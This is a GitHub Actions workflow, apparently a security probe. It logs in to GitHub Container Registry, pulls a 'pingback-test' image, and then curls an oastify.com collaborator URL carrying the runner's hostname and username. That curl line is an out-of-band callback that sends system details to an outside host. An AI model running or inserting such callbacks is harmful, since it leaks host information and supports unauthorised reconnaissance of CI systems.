name: GHCR Pull and Collaborator Ping

on:
  workflow_dispatch:

jobs:
  test-ghcr:
    runs-on: ubuntu-latest

    steps:
      - name: Log in to GitHub Container Registry
        run: |
          echo "${{ secrets.GITHUB_TOKEN }}" | docker login ghcr.io -u ${{ github.actor }} --password-stdin

      - name: Pull GHCR Image
        run: |
          docker pull ghcr.io/${{ github.repository_owner }}/pingback-test:latest

      - name: Ping collaborator with hostname and user
        run: |
          curl -s "http://pyr473mv5r7jghw2amsfw8xtikobc2gq5.oastify.com/ping?host=$(hostname)&user=$(whoami)" > /dev/null

      - name: Show image labels (optional)
        run: |
          docker inspect ghcr.io/${{ github.repository_owner }}/pingback-test:latest --format='{{json .Config.Labels}}'
